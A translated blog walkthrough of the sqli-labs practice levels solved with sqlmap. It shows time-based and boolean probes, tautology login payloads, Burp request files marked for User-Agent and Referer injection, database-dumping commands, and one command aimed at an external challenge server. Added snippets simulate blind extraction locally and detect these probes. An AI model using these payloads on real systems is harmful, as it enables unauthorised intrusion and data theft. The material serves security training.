Sqli-labs basics: solving every level with SQLMAP, no manual injection (Tanabata gift!!!)

Source: Internet
Author: User

Personal profile:
A newbie, a total noob, winging it, can only shout 66

This article was written off and on over three days, and I checked many other people's blogs,

but found that most people use manual injection for sqli-labs.

Because I'm too much of a noob myself, I could only find tools to inject with (QAQ)

I hope you guys don't take offense!!

Whether you like it or not, leave a message!!!

On solving Sqli-labs with Sqlmap injection, using manual injection as little as possible

For Less 1-4 of Sqli-labs I have written up the specific process in another article:

Https://www.cnblogs.com/lxz-1263030049/p/9363151.html

Sqli-labs Less 5-9 require you to determine the injection method first.

The specific way of judging is as follows:

1: Probe for time-delay (time-based) blind injection:

?id=1' and sleep(5)--+

2: Probe for Boolean-based blind injection:

?id=1' and 1=1--+ and ?id=1' and 2=1--+

Then judge by the different responses the two probes return.

The main statements used:

sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-8/?id=1 --technique B --dbms mysql --batch -v 0

Or:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --dbs --batch

--technique selects the injection technique in sqlmap; sqlmap supports five techniques:

B: boolean-based blind (Boolean-based injection)
E: error-based (error-based injection)
U: union query-based (UNION injection)
S: stacked queries (multi-statement injection; reading the file system, the operating system or the registry through sqlmap requires this one)
T: time-based blind (time-delay injection)

We change the letters after --technique according to the different error messages and responses we observed.

--dbms: you can specify not only the database type but also the database version.

--batch: with this parameter no user input is needed; sqlmap keeps running with the default answer to each of its prompts.

-v 0 (verbosity level 0) just keeps the output tidier.

Question 8:

Use the statement: python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --dbs --batch

Or use this statement:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" --current-db --threads 5 --batch --technique BES

and you get information about the database.

Question 9

Time-delay (time-based blind) injection, as identified above; a similar statement works:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-9/?id=1" --technique T --dbs --batch -v 0

About Less 11-17:

These are POST injection problems, but with blind injection mixed in; you need Burp, or the HackBar add-on in the Firefox browser, either works.

Question 11: POST injection, error-based, string (character) type

Sqlmap can be run based on the value echoed back by the POST.

The statements used are:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-11/?id=1" --data "uname=11111&passwd=111111&submit=Submit" --dbs --threads 5 --batch --technique ES

where:

--data: the string that follows is sent as the request data (works for both POST and GET).

--threads: maximum number of concurrent threads. In blind injection each thread retrieves one character at a time (7 requests per character) and takes the next one after finishing; the default is 1, and it is recommended not to exceed 10, otherwise site availability may be affected.
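As an added example (not from the original post) of why a blind extraction costs about 7 requests per character and how --threads multiplies what the site receives: a local simulation in which a plain Python function stands in for the true/false page difference, so no requests are sent anywhere. SECRET and the 7-bit ASCII candidate range are assumptions of the simulation.

```python
# Added example (not from the original post). A local model of how a
# boolean-based blind technique recovers a value one character at a time:
# each true/false answer is one request, and a binary search over the 128
# ASCII codes needs exactly ceil(log2(128)) = 7 answers per character.
# Nothing here touches the network; the oracle is an in-memory function.

SECRET = "security"   # constructed stand-in for the value being recovered


def make_oracle(secret):
    """Return (oracle, counter). oracle(pos, t) answers ord(secret[pos]) > t,
    and counter['requests'] counts how many answers were needed."""
    counter = {"requests": 0}

    def is_greater_than(position, threshold):
        counter["requests"] += 1          # one answer == one request seen by the server
        return ord(secret[position]) > threshold

    return is_greater_than, counter


def recover_value(length, oracle):
    """Recover `length` characters using only the 'greater than' oracle."""
    chars = []
    for pos in range(length):
        lo, hi = 0, 127                   # candidate range: 7-bit ASCII
        while lo < hi:                    # halves the range: 128 -> 64 -> ... -> 1
            mid = (lo + hi) // 2
            if oracle(pos, mid):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


def request_budget(n_chars, threads):
    """Total requests the target receives for n_chars, and how many sequential
    rounds of 7 remain when `threads` characters are fetched in parallel.
    This is the burst size that --threads trades against site availability."""
    rounds = -(-n_chars // threads)       # ceiling division
    return 7 * n_chars, 7 * rounds


if __name__ == "__main__":
    oracle, counter = make_oracle(SECRET)
    print(recover_value(len(SECRET), oracle), counter["requests"])   # security 56
    print(request_budget(len(SECRET), 10))                           # (56, 7)
```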

The rest just proceeds as normal.

Question 12:

A similar process works:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-12/?id=1" --data 'uname=") or ("1")=("1&passwd=") or ("1")=("1&submit=Submit' --dbs --threads 5 --batch --technique E

Or use this statement:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-12/?id=1" --data 'uname=") or ("1")=("1&passwd=") or ("1")=("1&submit=Submit' --dbs --threads 5 --batch --technique BES

Question 13: you can use this statement:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-13/?id=1" --data "uname=') or ('1')=('1&passwd=') or ('1')=('1&submit=Submit" --dbs --threads 5 --batch --technique EBS

This also gets the result (the other similar levels use the same technique).

Question 15: Boolean-based and time-based blind injection,

The simple injection statement is:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-15/?id=1" --data "uname=' or '1'='1&passwd=' or '1'='1&submit=Submit" --dbs --threads 5 --batch --technique BET

Here are Sqli-labs 18-20.

These three levels are mainly about injection through HTTP headers.

The common places where HTTP header injection points appear are:

"Referer", "X-Forwarded-For", "Cookie", "X-Real-IP", "Accept-Language", "Authorization"
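As an added example that is not part of the original post: a small Python detector that scans a request's query string, form body and the header fields listed above for the probes this article uses (sleep(), and 1=1 / and 2=1, the ' or '1'='1 tautologies, the --+ comment terminator, and sqlmap's default User-Agent). The sample requests are constructed, and the regular expressions are my own assumptions rather than anything taken from sqlmap.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Header names the article lists as common injection points, plus User-Agent.
INJECTABLE_HEADERS = {"user-agent", "referer", "x-forwarded-for", "cookie",
                      "x-real-ip", "accept-language", "authorization"}

# Applied to the URL-decoded, lower-cased value of each field (my own patterns).
PROBE_PATTERNS = {
    "time-based":   re.compile(r"\b(sleep|benchmark)\s*\("),        # ' and sleep(5)
    "boolean":      re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+"),      # and 1=1 / and 2=1
    "tautology":    re.compile(r"""['"]\)?\s*(or|and)\s*\(?['"]\d+['"]\)?\s*=\s*\(?['"]\d+"""),
    "comment-end":  re.compile(r"(--\s|#)\s*$"),                    # --+ decodes to "-- "
    "sqlmap-agent": re.compile(r"sqlmap"),                          # default User-Agent
}

def scan_value(location, raw_value):
    """(probe, location) for every pattern that matches one decoded field."""
    value = unquote_plus(raw_value).lower()
    return [(probe, location) for probe, pat in PROBE_PATTERNS.items() if pat.search(value)]

def scan_pairs(prefix, encoded):
    """Scan a still-encoded query string or form body of the form a=b&c=d."""
    hits = []
    for pair in filter(None, encoded.split("&")):
        name, _, value = pair.partition("=")
        hits += scan_value(f"{prefix}:{unquote_plus(name)}", value)
    return hits

def classify_request(request_line, headers, body=""):
    """Classify one request: request line, header dict, optional form body."""
    method, target, _ = request_line.split(" ", 2)
    findings = scan_pairs("param", urlsplit(target).query) + scan_pairs("form", body)
    for name, value in headers.items():
        if name.lower() in INJECTABLE_HEADERS:
            findings += scan_value(f"header:{name}", value)
    return {"method": method, "suspicious": bool(findings), "findings": findings}

# Constructed sample traffic mirroring the article's probes (not real captures).
UA = "Mozilla/5.0"
SAMPLES = [
    ("GET /sqli-labs-master/Less-9/?id=1%27%20and%20sleep(5)--+ HTTP/1.1", {"User-Agent": UA}, ""),
    ("GET /sqli-labs-master/Less-8/?id=1%27%20and%202=1--+ HTTP/1.1", {"User-Agent": UA}, ""),
    ("POST /sqli-labs-master/Less-18/ HTTP/1.1", {"User-Agent": UA + "' AND 1=1#", "Cookie": "PHPSESSID=x"},
     "uname=admin&passwd=admin&submit=Submit"),
    ("POST /sqli-labs-master/Less-15/ HTTP/1.1", {"User-Agent": UA}, "uname=%27+or+%271%27%3D%271&passwd=x&submit=Submit"),
    ("GET /sqli-labs-master/Less-1/?id=1 HTTP/1.1", {"User-Agent": "sqlmap/1.x (http://sqlmap.org)"}, ""),
    ("GET /sqli-labs-master/Less-1/?id=1 HTTP/1.1", {"User-Agent": UA, "Referer": "http://127.0.0.1/"}, ""),
]
```

Calling classify_request on each SAMPLES entry flags the first five (reporting which parameter or header carried the probe) and leaves the last, benign one clean.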

Question 18: error-based, single quote, User-Agent injection point

Since this level injects through the User-Agent, using it directly, the statement is:

python sqlmap.py -r 1.txt --dbs --threads 5 --batch --technique BTES

Contents of the TXT file:

POST /sqli-labs-master/Less-18/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/sqli-labs-master/Less-18/
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Connection: close
Upgrade-Insecure-Requests: 1

uname=admin&passwd=admin&submit=Submit

This is the request captured by Burp; the * after the User-Agent value is the marker that tells sqlmap where to inject.

-r: sqlmap reads the HTTP request from a text file, so you can skip setting some other parameters (such as cookie, POST data, etc.)

Or you can do this:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-18/" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0*" --level 4 --dbs --threads 5 --technique BEST --batch

--user-agent: the value carried in the HTTP User-Agent header, i.e. the string that identifies the browser. For sqlmap to check the injection point in the User-Agent, --level must be >= 3 (level >= 3 tests the User-Agent header).

Question 19: error-based, single quote, Referer injection point

The approach for this level is the same as in the previous question:

python sqlmap.py -r 1.txt --dbs --threads 5 --batch --technique BEST

Only the file saved as 1.txt becomes this:

POST /sqli-labs-master/Less-19/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/sqli-labs-master/Less-19/*
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Connection: close
Upgrade-Insecure-Requests: 1

uname=admin&passwd=admin&submit=Submit

Alternatively, you can use this statement to dump the databases:

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-19/" --referer="http://127.0.0.1/sqli-labs-master/Less-19/*" --level 4 --dbs --threads 5 --technique BEST --batch

Some of these options have already been introduced above.

Here's the last question.

Question 20: error-based, single quote, cookie injection

For the last question, I'll end with a problem I came across most recently.

Challenge link: http://202.112.51.184:16080/

Look directly at the captured packet:

The cookie has a problem; use Sqlmap directly to inject:

python sqlmap.py -u "http://202.112.51.184:16080/" --cookie="PHPSESSID=cbc3a5ec86e968fa6ee74f1839c2097e" --dbs

--cookie: when the web application uses cookie-based authentication, or for POST requests, you can specify the cookie: sqlmap -u "url" --cookie="..." --level 3

